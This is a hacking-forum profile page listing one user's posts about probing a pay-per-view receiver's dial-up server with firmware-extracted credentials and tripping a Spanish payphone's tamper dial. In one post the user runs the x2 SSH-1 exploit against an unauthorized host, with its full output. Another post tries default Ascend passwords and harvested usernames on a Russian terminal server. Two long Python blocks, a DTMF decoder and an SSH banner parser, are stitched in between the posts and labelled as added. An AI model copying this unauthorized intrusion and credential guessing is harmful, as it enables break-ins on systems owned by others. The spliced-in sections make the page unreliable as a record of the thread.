Reaper45

About Reaper45

  • Rank
    SCRiPT KiDDie
  1. So I was wondering what my satellite TV receiver does when I buy a pay-per-view movie. It first dials a number with its own modem, which I guessed using DTMF decoder software. After dialing that number with my PC, HyperTerminal shows me a login screen. Later I hex-edited a firmware dump of the receiver and found the username and password it uses to connect, and checked them later. They are valid, but after the login screen, apparently nothing happens next. I tried making a new Internet connection with that number and login info, but the connection fails. I think it's because I'm not using the correct protocol... Any ideas on how I should continue? Thanks in advance.
  2. Yeah, but the automated lady says that the number is not in use. It's still amazing that you did this by ear. P.S.: It's the first time I've seen a forum reply with a disclaimer xD Nice.
  3. You might not have realized yet that the last one was recorded at night and that I did it directly from the payphone's speaker. Anyway, I really appreciate your interest in helping me, guys. Here's what I realized: the 10th digit that some of you are hearing is indeed a ringback tone. I am able to hear it clearly after forcing the payphone to dial the number. I wonder why it connects so fast. I am also 99% sure that there are only 9 digits, as that is the standard here in Spain. I have also read that the number is different in every state, so the first and second digits could be "9" and "2", as those are the ones that belong to my city. I'll keep trying to get better recordings, this time with some other hardware.
  4. Oh, I do not. Megaupload always gives me my daily ration of warez xD. I posted a rar just because there were a lot of files. Anyway, I was finally able to get a good recording. Now the software DTMF decoders analyze some tones, even if they are wrong. Here it goes. 15.wav
  5. My very first hack? Well, when I was around 5-6 years old, my father bought an old 386. Soon my sister installed a pirated version of Prehistorik, and my father used to enter the commands to start the game for me. One day he wasn't there and I tried to do it by myself, but I was scared because my mother told me that if I touched the computer it could break. So I spent 30 minutes trying to figure out how to use the command dir and how to run executables. In the end, the solution to the problem was something like this:
     c:\>dir
     [...]
     c:\>cd prehisto
     c:\prehisto>dir
     [...]
     c:\prehisto>unprehst.com [a crack in RAM memory]
     Programa instalado correctamente. (Program installed correctly.)
     Fuck you Eric Zmiro!!
     c:\prehisto>prehisto.exe [the game]
     Years later, I realized that I had fun doing this too xD. After that, I was curious, so I typed c:\prehisto>edit prehisto.exe and I was amazed because it gave me the message "Best protection by Eric Zmiro". This was impressive to me, and then I realized what the "unprehst.com" program was for. P.S.: I still use "dir" instead of "ls" in Linux xD.
  6. OK, thanks for the help. I have more recordings, but this one was the best I got. They were made with my Nokia phone (sorry for that). Next time I'll try recording it at night. By the way, I know for sure that it is a nine-digit number. After searching a bit I found a doc that says that there is a number for every state. So we could guess from this that the first one is 9, and the second is possibly 2. That is the area code of my state. Also, the paper says that I need a V.23 modem to connect to the number or the payphone... Wikipedia says that I can put my modem in V.23 mode by changing the S37 register (http://en.wikipedia.org/wiki/Hayes_command_set). I tried it with the payphone number but I got a "NO CARRIER" answer. In speed autodetect mode (0), at least I was able to get garbage in the terminal. Payphones here react strangely. If you dial the number, the payphone answers automatically after a tone, and you can hear the noise of the street and the people talking (!!), and a few seconds later the line goes silent and the carrier answers. The board doesn't allow me to upload any .amr or .rar files, so you'll have to deal with Mega. (Hint! Sayonara to captcha and hidden links. xD) http://www.megaupload.com/?d=DP73BG50
  7. I'm trying to decode the DTMF tones of a number from a recording I just made. The problem is that there is too much noise from cars and the wind, and it doesn't seem that I will be able to remove it easily. I tried to reduce the noise with Adobe Audition, but I'm not very good with it. Do you guys want to give it a try? The recording is from a payphone in Spain. The payphone automatically dials it when a hack attempt on the setup menu is made (enter *23# and input an incorrect password 3 times). Although the microphone goes off, the payphone does not turn off the speaker after that, so I was able to catch it. Soon I'll write a good article on hacking Telefonica payphones http://www.megaupload.com/es/?d=8ZPFGSB0
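The decoding problem in posts 3, 4, 6 and 7 (pulling a dialled number out of a noisy speaker recording) is what a Goertzel-based DTMF decoder is for. The block below is an added example, not the poster's code or any of the decoder tools mentioned in the thread. It assumes 8 kHz mono audio as floats in [-1, 1]; the "recording" it decodes is constructed in `synth()` (tones with Gaussian noise added, padded with noise-only audio), not the posted file. A symbol is accepted only when one row tone and one column tone each stand clearly above the other three of their group and persist for two consecutive 20 ms frames, which is what lets it ignore wind and traffic that raise the noise floor but do not form a row/column pair. `load_wav()` is the only part that touches a real file and is not exercised here.

```python
"""Goertzel-based DTMF decoder, demonstrated on constructed noisy audio.

Added example, not from the original thread. Assumptions: 8 kHz mono float
samples; tone/gap timings and the noise level below are made up for the demo.
"""
import math
import random
import struct
import wave

SAMPLE_RATE = 8000
LOW_FREQS = (697, 770, 852, 941)        # DTMF row tones
HIGH_FREQS = (1209, 1336, 1477, 1633)   # DTMF column tones
KEYPAD = ("123A", "456B", "789C", "*0#D")


def dtmf_pair(digit):
    """Return the (row, column) frequencies of a keypad symbol."""
    for r, row in enumerate(KEYPAD):
        c = row.find(digit)
        if c >= 0:
            return LOW_FREQS[r], HIGH_FREQS[c]
    raise ValueError("not a DTMF symbol: %r" % digit)


def synth(digits, tone_ms=70, gap_ms=60, noise=0.3, seed=1, pad_ms=100):
    """Constructed input: each digit as a two-tone burst of amplitude 0.5+0.5,
    Gaussian noise (sigma=noise) everywhere, noise-only padding at both ends."""
    rng = random.Random(seed)

    def segment(ms, lo=None, hi=None):
        out = []
        for n in range(ms * SAMPLE_RATE // 1000):
            t = n / SAMPLE_RATE
            s = rng.gauss(0.0, noise)
            if lo is not None:
                s += 0.5 * math.sin(2 * math.pi * lo * t) + 0.5 * math.sin(2 * math.pi * hi * t)
            out.append(s)
        return out

    samples = segment(pad_ms)
    for d in digits:
        lo, hi = dtmf_pair(d)
        samples += segment(tone_ms, lo, hi)
        samples += segment(gap_ms)
    return samples + segment(pad_ms)


def goertzel_power(frame, freq):
    """|X(freq)|^2 of one frame: a single-bin DFT via the Goertzel recurrence."""
    w = 2.0 * math.pi * freq / SAMPLE_RATE
    coeff = 2.0 * math.cos(w)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def detect_frame(frame, min_amp=0.1, ratio=4.0):
    """Symbol present in one frame, or None. The strongest row tone and the
    strongest column tone must each beat the runner-up of its group by `ratio`
    and exceed the power a pure sinusoid of amplitude `min_amp` would give."""
    n = len(frame)
    floor = (min_amp * n / 2.0) ** 2           # |X|^2 of a sinusoid = (A*N/2)^2
    rows = sorted(((goertzel_power(frame, f), f) for f in LOW_FREQS), reverse=True)
    cols = sorted(((goertzel_power(frame, f), f) for f in HIGH_FREQS), reverse=True)
    for (best, _), (second, _) in ((rows[0], rows[1]), (cols[0], cols[1])):
        if best < floor or best < ratio * second:
            return None
    return KEYPAD[LOW_FREQS.index(rows[0][1])][HIGH_FREQS.index(cols[0][1])]


def decode(samples, frame_ms=20, min_frames=2):
    """Decode the dialled string: a symbol is emitted once it has been seen in
    `min_frames` consecutive frames, and again only after it has dropped out."""
    n = frame_ms * SAMPLE_RATE // 1000
    digits, current, run = [], None, 0
    for i in range(0, len(samples) - n + 1, n):
        sym = detect_frame(samples[i:i + n])
        if sym is not None and sym == current:
            run += 1
        else:
            run = 1 if sym is not None else 0
        current = sym
        if sym is not None and run == min_frames:
            digits.append(sym)
    return "".join(digits)


def load_wav(path):
    """Read a 16-bit mono 8 kHz PCM WAV into floats (for a real recording;
    convert/resample with sox or Audition first if the file differs)."""
    with wave.open(path, "rb") as w:
        if w.getnchannels() != 1 or w.getsampwidth() != 2 or w.getframerate() != SAMPLE_RATE:
            raise ValueError("expected 16-bit mono %d Hz PCM" % SAMPLE_RATE)
        raw = w.readframes(w.getnframes())
    return [v / 32768.0 for v in struct.unpack("<%dh" % (len(raw) // 2), raw)]


if __name__ == "__main__":
    print(decode(synth("912345678")))
```

Two practical notes for a recording like the one in the post: if the decoder returns more symbols than expected, the extras are usually the ringback and call-progress tones mentioned in post 3, which sit at other frequencies and fail the row/column pairing on all but the noisiest frames, so raising `ratio` removes them before touching `min_amp`; and if it returns too few, check the WAV rate first, because a tone-frequency table computed for 8 kHz is wrong for a phone recording stored at 8 kHz AMR decoded to 16 kHz.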
  8. Tcptrace can get past firewalls that block traceroute. Paratrace from Dan Kaminsky also works well, but in a different way.
  9. I'm sure there are other holes in this host, but I'm curious since I never hacked through a front door like SSH, and this is the perfect chance. It looks like a default installation. Xprobe2 says that the host is running Linux kernel 2.2.X. So I telnetted to port 22 and...
     fake@fake-desktop:~$ telnet xxx.xxx.xxx.xxx 22
     Trying xxx.xxx.xxx.xxx...
     Connected to xxx.xxx.xxx.xxx.
     Escape character is '^]'.
     SSH-1.5-1.2.25
     Protocol mismatch.
     Connection closed by foreign host.
     Incredible, right? So I ran to milw0rm and downloaded x2.tgz, an exploit made by some guy from team teso, which seems to have disappeared already. I chose target 42 as it seems to be the right one in the targets.txt file.
     fake@fake-desktop:~/$ ./x2 -t 42 xxx.xxx.xxx.xxx
     SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
     Target: MNS quick - SSH-1.5-1.2.25
     Attacking: xxx.xxx.xxx.xxx:22
     Testing if remote sshd is vulnerable # ATTACH NOW YES #
     Finding h - buf distance (estimate)
     (1 ) testing 0x00000004 # SEGV #
     (2 ) testing 0x0000c804 # FOUND #
     Found buffer, determining exact diff
     Finding h - buf distance using the teso method
     (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SURVIVED #
     (4 ) binary-search: h: 0x083ff7fc, slider: 0x00004000 # SEGV #
     (5 ) binary-search: h: 0x083fd7fc, slider: 0x00002000 # SURVIVED #
     (6 ) binary-search: h: 0x083fe7fc, slider: 0x00001000 # SEGV #
     (7 ) binary-search: h: 0x083fdffc, slider: 0x00000800 # SEGV #
     (8 ) binary-search: h: 0x083fdbfc, slider: 0x00000400 # SURVIVED #
     (9 ) binary-search: h: 0x083fddfc, slider: 0x00000200 # SURVIVED #
     (10) binary-search: h: 0x083fdefc, slider: 0x00000100 # SEGV #
     (11) binary-search: h: 0x083fde7c, slider: 0x00000080 # SURVIVED #
     (12) binary-search: h: 0x083fdebc, slider: 0x00000040 # SEGV #
     (13) binary-search: h: 0x083fde9c, slider: 0x00000020 # SURVIVED #
     (14) binary-search: h: 0x083fdeac, slider: 0x00000010 # SEGV #
     (15) binary-search: h: 0x083fdea4, slider: 0x00000008 # SURVIVED #
     Bin search done, testing result
     Finding exact h - buf distance
     (16) trying: 0x083fdea4 # SEGV #
     (17) trying: 0x083fdeac # SEGV #
     (18) trying: 0x083fdeb4 # SEGV #
     (19) trying: 0x083fdebc # SURVIVED #
     Exact match found at: 0x00002144
     Looking for exact buffer address
     Finding exact buffer address
     (20) Trying: 0x08072144 # SEGV #
     (21) Trying: 0x08073144 # SEGV #
     (22) Trying: 0x08074144 # SEGV #
     (23) Trying: 0x08075144 # SEGV #
     (24) Trying: 0x08076144 # SEGV #
     (25) Trying: 0x08077144 # SEGV #
     (26) Trying: 0x08078144 # SEGV #
     (27) Trying: 0x08079144 # SEGV #
     (28) Trying: 0x0807a144 # SEGV #
     (29) Trying: 0x0807b144 # SEGV #
     (30) Trying: 0x0807c144 # SEGV #
     (31) Trying: 0x0807d144 # SEGV #
     (32) Trying: 0x0807e144 # SEGV #
     (33) Trying: 0x0807f144 # SEGV #
     (34) Trying: 0x08080144 # SEGV #
     (35) Trying: 0x08081144 # SEGV #
     (36) Trying: 0x08082144 # SEGV #
     (37) Trying: 0x08083144 # SEGV #
     (38) Trying: 0x08084144 # SEGV #
     (39) Trying: 0x08085144 # SEGV #
     (40) Trying: 0x08086144 # SEGV #
     (41) Trying: 0x08087144 # SEGV #
     (42) Trying: 0x08088144 # SEGV #
     (43) Trying: 0x08089144 # SEGV #
     (44) Trying: 0x0808a144 # SEGV #
     (45) Trying: 0x0808b144 # SEGV #
     (46) Trying: 0x0808c144 # SEGV #
     (47) Trying: 0x0808d144 # SEGV #
     (48) Trying: 0x0808e144 # SEGV #
     (49) Trying: 0x0808f144 # SEGV #
     (50) Trying: 0x08090144 # SEGV #
     (51) Trying: 0x08091144 # SEGV #
     (52) Trying: 0x08092144 # SEGV #
     (53) Trying: 0x08093144 # SEGV #
     (54) Trying: 0x08094144 # SEGV #
     (55) Trying: 0x08095144 # SEGV #
     (56) Trying: 0x08096144 # SEGV #
     (57) Trying: 0x08097144 # SEGV #
     (58) Trying: 0x08098144 # SEGV #
     (59) Trying: 0x08099144 # SEGV #
     (60) Trying: 0x0809a144 # SEGV #
     (61) Trying: 0x0809b144 # SEGV #
     (62) Trying: 0x0809c144 # SEGV #
     (63) Trying: 0x0809d144 # SEGV #
     (64) Trying: 0x0809e144 # SEGV #
     (65) Trying: 0x0809f144 # SEGV #
     (66) Trying: 0x080a0144 #
     From here on the exploit doesn't stop; it's quite clear it's vulnerable, but it cannot find the buffer address in memory.
     So I wanted to ask you if you have any of the other versions of this exploit. I'm aware that x3.tgz and x4.tgz exist, but I was not able to find them.
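The first thing in the post above is the server identification string, "SSH-1.5-1.2.25", and the "Protocol mismatch." that follows it: an SSH server sends its identification line first and then expects the client's line in the same format, so anything typed into telnet that does not start with "SSH-" gets that reply and a closed connection. The block below is an added example, not code from the thread or from the x2 exploit: it parses an identification line into protocol version, software version and comments (the RFC 4253 layout, which the SSH-1 servers also followed, except that they ended the line with a bare LF), and classifies what the server speaks: 1.3 and 1.5 are SSH-1 only, 1.99 means SSH-1 with SSH-2 also available, 2.0 is SSH-2 only. The sample banners are constructed, not captured; `grab_banner()` is the only network-touching part and is not run here, and it answers with a well-formed client line (the name "bannercheck" is made up) so the server closes cleanly instead of logging a protocol mismatch.

```python
"""Parse and classify SSH identification strings like 'SSH-1.5-1.2.25'.

Added example, not from the thread or the x2 exploit. Assumes the
SSH-<protoversion>-<softwareversion>[ <comments>] layout (RFC 4253 section 4.2).
"""
import re
import socket

# constructed sample lines, not captured from any host
SAMPLE_BANNERS = (
    "SSH-1.5-1.2.25\n",                             # the string quoted in the post
    "SSH-1.99-OpenSSH_3.9p1\r\n",                    # SSH-1 plus SSH-2
    "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n",   # SSH-2 with a comment field
    "Protocol mismatch.\r\n",                        # what the server says to a non-SSH line
)

_IDENT = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comments>.*))?$")


def is_identification(line):
    """True if `line` is shaped like an SSH identification string."""
    return _IDENT.match(line.rstrip("\r\n")) is not None


def parse_banner(line):
    """Split an identification line into its fields; ValueError otherwise."""
    m = _IDENT.match(line.rstrip("\r\n"))
    if m is None:
        raise ValueError("not an SSH identification string: %r" % line)
    proto = m.group("proto")
    return {
        "protocol": proto,
        "software": m.group("software"),
        "comments": m.group("comments"),
        # 1.3 and 1.5 are SSH-1; 1.99 advertises SSH-1 with SSH-2 available; 2.0 is SSH-2
        "ssh1": proto in ("1.3", "1.5", "1.99"),
        "ssh2": proto in ("1.99", "2.0"),
    }


def ssh1_only(line):
    """True when the server offers nothing but the legacy SSH-1 protocol,
    i.e. the situation the post above is looking at."""
    info = parse_banner(line)
    return info["ssh1"] and not info["ssh2"]


def grab_banner(host, port=22, timeout=5.0):
    """Network helper (not exercised by the test): read the server's line,
    then send a well-formed client identification so the exchange ends
    cleanly rather than with 'Protocol mismatch'. 'bannercheck' is a made-up
    software name."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = b""
        while not data.endswith(b"\n") and len(data) < 256:
            chunk = s.recv(1)
            if not chunk:
                break
            data += chunk
        info = parse_banner(data.decode("ascii", "replace"))
        s.sendall(b"SSH-2.0-bannercheck\r\n" if info["ssh2"] else b"SSH-1.5-bannercheck\n")
    return info


if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(repr(b), "->", parse_banner(b) if is_identification(b) else "not an identification line")
```

The useful check this gives over reading the banner by eye: `ssh1_only()` is what separates a host like the one in the post (protocol 1.5, an ssh-1.2.x version string, the deattack bug that the x2 output above is probing for) from a server that merely advertises 1.99 for compatibility but will actually negotiate SSH-2.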
  10. I remember I was messing around with at+ms= on modem 5:(?), but didn't manage to connect. Also... DN stands for atd + number, right? Or am I missing something?
  11. Well... Not all bugs can be exploited remotely. I never tried to hack fotolog anyway.
  12. I did not understand a single word xD
  13. I was lucky guessing that the area code was 495. I'm surprised how fast the call was completed. Never called Russia before. The call went through my mobile phone by setting the terminal at 9600 baud.
     ate1
     OK
     atd+7739-0241
     NO CARRIER
     atd+007739-0241
     NO CARRIER
     atd+7495739-0241
     CONNECT 9600
     Welcome to TeleCore
     Login: Mihail
     Password:
     Login incorrect
     Login: Full Access
     Password:
     Login incorrect
     Login: doro
     Password:
     Login incorrect
     NO CARRIER
     Here you see, I tried the default password of an Ascend Pipeline terminal server (user: Full Access, password: Ascend) and the usernames that finger gave me. But who knows, maybe I'm not dialing the same node. Anyway, my wallet says it's not a good idea to try to crack the passwords. EDIT: More info. http://208.20.202.14/rte-ascend/1999/Nov/msg00038.html http://archives.real-time.com/rte-ascend/1...p/msg20286.html What's a PRI? If only we had a manual...
  14. That's not the problem. This is a classic case of client-side checks where they should be server-side. I knew that. It was just to point out that if you manage to access the server you could easily get root by exploiting that Apache version.
  15. 1) Write your text in Notepad. 2) Paste it in the photo comment box without pressing any other key. 3) Update! Found it the other day while uploading a photo. Well... not surprised, since I heard that they use ancestral versions of the Apache server xD